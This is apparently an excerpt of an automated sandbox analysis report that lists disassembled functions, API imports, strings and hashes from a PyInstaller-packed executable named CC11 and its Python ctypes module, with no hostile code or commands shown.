PyObject_Str.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DC7C
PyUnicode_AppendAndDel.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DC8E
PyUnicode_FromString.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DC9B
PyUnicode_AppendAndDel.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DCA8
PyErr_Clear.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DCB7
PyObject_Str.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DCC1
PyErr_Clear.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DCCC
PyUnicode_FromString.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DCD9
PyUnicode_AppendAndDel.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DCE6
PyErr_SetObject.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DCFB
_Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DD10
_Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DD25
_Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DD3A
_Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DD4F

Strings

???, xrefs: 00007FF8BFB7DCD2

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Unicode_$Err_$Dealloc$AppendFrom$ClearObject_String$ExceptionFetchFormatNormalizeObject
String ID: ???
API String ID: 2201921740-1053719742
Opcode ID: ecb6db16fea7d3ec4b1d10a42f34de8fe402f80ec48bd489ff59f9729515affa
Instruction ID: 5402b7a0c2a68ef9d3c1489c51844268f24eecf74884348ec3e04a01751d29f7
Opcode Fuzzy Hash: ecb6db16fea7d3ec4b1d10a42f34de8fe402f80ec48bd489ff59f9729515affa
Instruction Fuzzy Hash: 8141D572F0BA0295EF059FE9E8541B82770BF88BD9F084535CB0E52A69DE2CE549C350

Function 00007FF8BFB77E03 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

PySequence_GetItem.PYTHON38 ref: 00007FF8BFB73000
PyUnicode_AsUTF8.PYTHON38 ref: 00007FF8BFB73110
PyMem_Malloc.PYTHON38 ref: 00007FF8BFB73150
PyMem_Free.PYTHON38 ref: 00007FF8BFB731A3
PyMem_Free.PYTHON38 ref: 00007FF8BFB731AC
PyObject_SetAttr.PYTHON38 ref: 00007FF8BFB73239
PyErr_SetString.PYTHON38 ref: 00007FF8BFB77E62
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB77E76
PyErr_Format.PYTHON38 ref: 00007FF8BFB77F26
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB77F36
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB77F48
PyErr_NoMemory.PYTHON38 ref: 00007FF8BFB77F4E
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB77F67
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB77F77
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB77F89
PyErr_Format.PYTHON38 ref: 00007FF8BFB77FBA

Strings

number of bits invalid for bit field, xrefs: 00007FF8BFB77E58
%s:%s:, xrefs: 00007FF8BFB73165
bit fields not allowed for type %s, xrefs: 00007FF8BFB77F11
UO|i, xrefs: 00007FF8BFB7302A

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dealloc$Err_$Mem_$FormatFree$AttrItemMallocMemoryObject_Sequence_StringUnicode_
String ID: %s:%s:$UO|i$bit fields not allowed for type %s$number of bits invalid for bit field
API String ID: 3175293119-1978056028
Opcode ID: bc37b6ce8a5a7c313a365d20831b984a8754113c41a18f45fcca063f25ce9297
Instruction ID: 9c390a68b3d70c9f1d0cd8e37f4d1d9402c0139322754451ca9696e5e72e189a
Opcode Fuzzy Hash: bc37b6ce8a5a7c313a365d20831b984a8754113c41a18f45fcca063f25ce9297
Instruction Fuzzy Hash: AF914932B09B8285EB50DFA9E9442A97BA4FB84BD4F640136EB5D47BA4DF3CE445C300

Function 00007FF8BFB7A0D4 Relevance: 29.8, APIs: 12, Strings: 5, Instructions: 72threadlibraryloaderCOMMON

Download Yara Rule

APIs

_PyArg_ParseTuple_SizeT.PYTHON38 ref: 00007FF8BFB7A0FC
PyObject_GetAttrString.PYTHON38 ref: 00007FF8BFB7A112
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7A141
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7A150
PyLong_AsVoidPtr.PYTHON38 ref: 00007FF8BFB7A16B
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7A17D
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB7A183
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7A19F
PyEval_SaveThread.PYTHON38 ref: 00007FF8BFB7A1A7
GetProcAddress.KERNEL32 ref: 00007FF8BFB7A1B8
PyEval_RestoreThread.PYTHON38 ref: 00007FF8BFB7A1C4
PyErr_Format.PYTHON38 ref: 00007FF8BFB7A1E5

Strings

Os:in_dll, xrefs: 00007FF8BFB7A0F5
could not convert the _handle attribute to a pointer, xrefs: 00007FF8BFB7A195
_handle, xrefs: 00007FF8BFB7A10B
the _handle attribute of the second argument must be an integer, xrefs: 00007FF8BFB7A137
symbol '%s' not found, xrefs: 00007FF8BFB7A1D6

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$String$DeallocEval_Thread$AddressArg_AttrFormatLong_Object_OccurredParseProcRestoreSaveSizeTuple_Void
String ID: Os:in_dll$_handle$could not convert the _handle attribute to a pointer$symbol '%s' not found$the _handle attribute of the second argument must be an integer
API String ID: 3341457601-4011516582
Opcode ID: b1682e2fe6b9403d153e33361adfdb6ece592f2eab746c08e332a8cb71686b83
Instruction ID: b90abc63d66aab3381113c22e803779ed3d266ec4aa3ac6edd4e1dd605e0bc86
Opcode Fuzzy Hash: b1682e2fe6b9403d153e33361adfdb6ece592f2eab746c08e332a8cb71686b83
Instruction Fuzzy Hash: 7E310721A0AA4281FB449FAEE9441B967A4FFC5FD1B188032DB1E47B65DE2CE449C300

Function 00007FF8BFB73BF0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 146COMMON

Download Yara Rule

APIs

PyBytes_AsString.PYTHON38(?,?,00000001,00007FF8BFB739E8), ref: 00007FF8BFB73C70

Strings

int too long to convert, xrefs: 00007FF8BFB7891C
Don't know how to convert parameter %d, xrefs: 00007FF8BFB789DB
_ctypes pymem, xrefs: 00007FF8BFB78961

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Bytes_String
String ID: Don't know how to convert parameter %d$_ctypes pymem$int too long to convert
API String ID: 338066286-4137960972
Opcode ID: 33638274120b6691e25a71324b87940aeb91d1c20ca3e18fdcd3bc5151672ed0
Instruction ID: cccf5181b86548c1b19daf808531bbff99bd487747566a116bc904812df269ec
Opcode Fuzzy Hash: 33638274120b6691e25a71324b87940aeb91d1c20ca3e18fdcd3bc5151672ed0
Instruction Fuzzy Hash: 13611A32B09B4282EB448FA9E88017877A4FF89BD4B584535DB5E437A5EF3CE465C340

Function 00007FF8BFB71458 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 117COMMON

Download Yara Rule

APIs

PyLong_FromSsize_t.PYTHON38 ref: 00007FF8BFB714A8
PyTuple_Pack.PYTHON38 ref: 00007FF8BFB714C5
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB714FD
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB71529
_PyObject_CallFunction_SizeT.PYTHON38 ref: 00007FF8BFB7159D
PyDict_New.PYTHON38 ref: 00007FF8BFB715D4
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB770A9

Part of subcall function 00007FF8BFB715F4: PyDict_GetItemWithError.PYTHON38(?,?,?,?,00007FF8BFB714E9), ref: 00007FF8BFB715FF

Strings

%.200s_Array_%Id, xrefs: 00007FF8BFB7154D
s(O){s:n,s:O}, xrefs: 00007FF8BFB7158F
Expected a type object, xrefs: 00007FF8BFB770BC
Array length must be >= 0, not %zd, xrefs: 00007FF8BFB77094
_length_, xrefs: 00007FF8BFB71579
_type_, xrefs: 00007FF8BFB71566

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: DeallocDict_$CallErr_ErrorFromFunction_ItemLong_Object_OccurredPackSizeSsize_tTuple_With
String ID: %.200s_Array_%Id$Array length must be >= 0, not %zd$Expected a type object$_length_$_type_$s(O){s:n,s:O}
API String ID: 2975079148-1488966637
Opcode ID: ea3da00a8fa99686a37871fc0586e0d07918280253ef6fcdb7a7c757238627c5
Instruction ID: 364c37ae874c3722bd935ba05a9ea512108220a1af62fc56db44825d9d64dcaf
Opcode Fuzzy Hash: ea3da00a8fa99686a37871fc0586e0d07918280253ef6fcdb7a7c757238627c5
Instruction Fuzzy Hash: 67513B21A0EB4285FB549FEAE8542B927A4FF85BD4F184435DB0E4A7A6EF3CE404C310

Function 00007FF8BFB7B6E8 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 154COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B72D
PyObject_CallObject.PYTHON38 ref: 00007FF8BFB7B767

Part of subcall function 00007FF8BFB7B6E8: _Py_Dealloc.PYTHON38 ref: 00007FF8BFB7B7D2
Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38 ref: 00007FF8BFB7B7F6
Part of subcall function 00007FF8BFB7B6E8: PyErr_Format.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B83C
Part of subcall function 00007FF8BFB7B6E8: PyObject_IsInstance.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B84D
Part of subcall function 00007FF8BFB7B6E8: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B86E
Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B883
Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B8BF
Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B8D9
Part of subcall function 00007FF8BFB7B6E8: PyTuple_Pack.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B94A

Strings

incompatible types, %s instance instead of %s instance, xrefs: 00007FF8BFB7B8E7
(%s) , xrefs: 00007FF8BFB7B77C
expected %s instance, got %s, xrefs: 00007FF8BFB7B823

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: SubtypeType_$Object_$CallDeallocErr_FormatInstanceObjectPackTuple_memcpy
String ID: (%s) $expected %s instance, got %s$incompatible types, %s instance instead of %s instance
API String ID: 1877528213-3177377183
Opcode ID: 7ccca54be5616b242e0a439406719945fb519f7f527055ac9e68d89d2586da33
Instruction ID: 919791c012086414eff86397576ae367676263872bc5282554837bec9f2b4a43
Opcode Fuzzy Hash: 7ccca54be5616b242e0a439406719945fb519f7f527055ac9e68d89d2586da33
Instruction Fuzzy Hash: 63615C66A09B4681EE549F9AE8402786BA1FF84FC4F088432DF0E47BA9DF3CE454C700

Function 00007FF8BFB7CA68 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 62COMMON

Download Yara Rule

APIs

PyUnicode_InternFromString.PYTHON38 ref: 00007FF8BFB7CA83
PyImport_ImportModuleNoBlock.PYTHON38 ref: 00007FF8BFB7CA97
PyErr_Clear.PYTHON38 ref: 00007FF8BFB7CAA5
PyObject_GetAttrString.PYTHON38 ref: 00007FF8BFB7CABF
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7CAD1
PyErr_WriteUnraisable.PYTHON38 ref: 00007FF8BFB7CAF1
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7CB0D
PyLong_AsLong.PYTHON38 ref: 00007FF8BFB7CB1B
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB7CB23
PyErr_WriteUnraisable.PYTHON38 ref: 00007FF8BFB7CB43
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7CB57

Strings

DllCanUnloadNow, xrefs: 00007FF8BFB7CAB5
_ctypes.DllCanUnloadNow, xrefs: 00007FF8BFB7CA7C
ctypes, xrefs: 00007FF8BFB7CA90

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$Dealloc$StringUnraisableWrite$AttrBlockClearFromImportImport_InternLongLong_ModuleObject_OccurredUnicode_
String ID: DllCanUnloadNow$_ctypes.DllCanUnloadNow$ctypes
API String ID: 3204538840-4136862661
Opcode ID: e5f9706139b700ebf3836e30170918d6d26f8e0498e862d4720c226ccd4189c0
Instruction ID: cb49acc2483c42fe3b5bd88a9e11b838eb57beeb980e9d9b9a587dc34c130b60
Opcode Fuzzy Hash: e5f9706139b700ebf3836e30170918d6d26f8e0498e862d4720c226ccd4189c0
Instruction Fuzzy Hash: 7021E965F0EA4781EE549FEDF99427867A1AF88BD5F084038CB0E47766EF6CA444C300

Function 00007FF8BFB73EF0 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 217COMMON

Download Yara Rule

APIs

PyTuple_New.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78B32
PyLong_AsUnsignedLongMask.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78BB4
PyErr_Format.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78CCC
_Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78CDD
PyTuple_GetSlice.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78E38

Strings

%s 'out' parameter must be passed as default value, xrefs: 00007FF8BFB78DEF
NULL stgdict unexpected, xrefs: 00007FF8BFB78E0F
paramflag %u not yet implemented, xrefs: 00007FF8BFB78DCC
call takes exactly %d arguments (%zd given), xrefs: 00007FF8BFB78CC2

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Tuple_$DeallocErr_FormatLongLong_MaskSliceUnsigned
String ID: %s 'out' parameter must be passed as default value$NULL stgdict unexpected$call takes exactly %d arguments (%zd given)$paramflag %u not yet implemented
API String ID: 3242343960-2588965191
Opcode ID: c3d25f6ff976ab77f80a9ea2e4cc46bf2b90c6acbe4a17057b8ead6a7b4d00b8
Instruction ID: 077eb5af6bb340e237d3818771cb770b4b3d677f9e822e3ecbb534f27f7207d4
Opcode Fuzzy Hash: c3d25f6ff976ab77f80a9ea2e4cc46bf2b90c6acbe4a17057b8ead6a7b4d00b8
Instruction Fuzzy Hash: FAA14A76A09B8285EB61CF9AE8402B977A4FB89BC4F244036DB4E87B55DF3CE455C700

Function 00007FF6900115C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON

Download Yara Rule

Strings

fread, xrefs: 00007FF69001178C
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF690011775
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6900116EF
Failed to create symbolic link %s!, xrefs: 00007FF6900115E2
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF690011785
fseek, xrefs: 00007FF690011695
fwrite, xrefs: 00007FF69001177C
Failed to extract %s: failed to open target file!, xrefs: 00007FF690011617
fopen, xrefs: 00007FF69001161E
Failed to extract %s: failed to open archive file!, xrefs: 00007FF69001165B
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF69001168E
malloc, xrefs: 00007FF6900116F6

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2030045667-1550345328
Opcode ID: 1bbf565b463eea6d97fbed96aab16e070d09f43d1a6955e35246163c6ac7f0b6
Instruction ID: ee742e4f6f097153597633819966c6b8083df9f4d1c47e0dab09a000bea35550
Opcode Fuzzy Hash: 1bbf565b463eea6d97fbed96aab16e070d09f43d1a6955e35246163c6ac7f0b6
Instruction Fuzzy Hash: 3951AC21B0CA43A2EA759B35A8405B923A5FF88B9CF4441B1EE1C877DDEF3CE5558700

Function 00007FF8BFB7BC94 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

_PyDict_GetItemIdWithError.PYTHON38 ref: 00007FF8BFB7BD10
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB7BD23

Part of subcall function 00007FF8BFB7BC94: PySequence_GetItem.PYTHON38 ref: 00007FF8BFB7BD68
Part of subcall function 00007FF8BFB7BC94: PySequence_GetItem.PYTHON38 ref: 00007FF8BFB7BD7F
Part of subcall function 00007FF8BFB7BC94: PyDict_GetItemWithError.PYTHON38 ref: 00007FF8BFB7BDA7
Part of subcall function 00007FF8BFB7BC94: PyErr_Occurred.PYTHON38 ref: 00007FF8BFB7BDB2
Part of subcall function 00007FF8BFB7BC94: PyObject_SetAttr.PYTHON38 ref: 00007FF8BFB7BDC8
Part of subcall function 00007FF8BFB7BC94: _Py_Dealloc.PYTHON38 ref: 00007FF8BFB7BDD9
Part of subcall function 00007FF8BFB7BC94: _Py_Dealloc.PYTHON38 ref: 00007FF8BFB7BDE8
Part of subcall function 00007FF8BFB7BC94: _Py_Dealloc.PYTHON38 ref: 00007FF8BFB7BE16
Part of subcall function 00007FF8BFB7BC94: _Py_Dealloc.PYTHON38 ref: 00007FF8BFB7BE4C

PyErr_Format.PYTHON38 ref: 00007FF8BFB7BE3B

Strings

duplicate values for field %R, xrefs: 00007FF8BFB7BE2E

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: DeallocItem$Err_$Dict_ErrorOccurredSequence_With$AttrFormatObject_
String ID: duplicate values for field %R
API String ID: 520049408-1910533534
Opcode ID: 63eb75f7de272bfca248c975c6237f03e04b0ca255ec1df21ccee52375a0f8c8
Instruction ID: abc7b1ecd865c5259e85cae8d9a9a5b4b89fb7aecb3bb5b2f2a167e02c0b8fef
Opcode Fuzzy Hash: 63eb75f7de272bfca248c975c6237f03e04b0ca255ec1df21ccee52375a0f8c8
Instruction Fuzzy Hash: 5A51A421B0AB4280EE149FAEA84457967A0BF85FE4F048631CF6D477A9EE3CE441C700

Function 00007FF6900177D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF690017C97,?,?,FFFFFFFF,00007FF690013834), ref: 00007FF69001782C

Part of subcall function 00007FF6900126C0: MessageBoxW.USER32 ref: 00007FF690012736

Strings

LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF690017840
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF69001796D
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF69001789D
\, xrefs: 00007FF690017861
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF690017803
%.*s, xrefs: 00007FF69001790C
CreateDirectory, xrefs: 00007FF690017974
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6900178D9

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction ID: ac90fb5e6628dfd6d958615af6f094d653f8b4ea7023b876f7e75e277221f3af
Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction Fuzzy Hash: 8041A321B1C643B1FBB1AB34E8556BA6261EF8878CF4444B2E64EC27DDEE3CE5458700

Function 00007FF8BFB7E5EC Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 83COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON38 ref: 00007FF8BFB7E60B
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7E63E
PyErr_Format.PYTHON38 ref: 00007FF8BFB7E664
PyErr_Format.PYTHON38 ref: 00007FF8BFB7E683
PyMem_Malloc.PYTHON38 ref: 00007FF8BFB7E6A4
PyErr_NoMemory.PYTHON38 ref: 00007FF8BFB7E6B2
memset.VCRUNTIME140 ref: 00007FF8BFB7E6C3
memcpy.VCRUNTIME140 ref: 00007FF8BFB7E6D7
PyMem_Realloc.PYTHON38 ref: 00007FF8BFB7E6EC

Strings

Memory cannot be resized because this object doesn't own it, xrefs: 00007FF8BFB7E679
